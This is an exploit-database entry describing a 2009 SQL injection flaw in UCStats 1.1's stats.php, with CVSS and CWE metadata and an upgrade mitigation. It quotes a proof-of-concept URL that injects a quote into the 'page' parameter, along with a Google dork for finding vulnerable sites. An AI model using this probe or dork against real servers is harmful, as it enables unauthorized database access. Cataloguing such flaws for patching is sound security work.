header-logo
Suggest Exploit
vendor:
UCStats
by:
Sora
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: UCStats
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Yes
Related CWE: CVE-2009-4010
CPE: a:ucstats:ucstats:1.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

UCStats 1.1 Remote SQL Injection Vulnerability

UCStats version 1.1 suffers a remote SQL injection vulnerability in stats.php. Proof of Concept (PoC): http://server/stats.php?game=cstrike&q=players&page=4'&sort=online&dir=asc

Mitigation:

Upgrade to the latest version of UCStats.
Source

Exploit-DB raw data:

> UCStats 1.1 Remote SQL Injection Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: "Powered by UCStats version 1.1"

# Vulnerability Description:
UCStats version 1.1 suffers a remote SQL injection vulnerability in stats.php.

# Code/Proof of Concept (PoC):
http://server/stats.php?game=cstrike&q=players&page=4'&sort=online&dir=asc

Navigation

Suggest Exploit

Services By CQR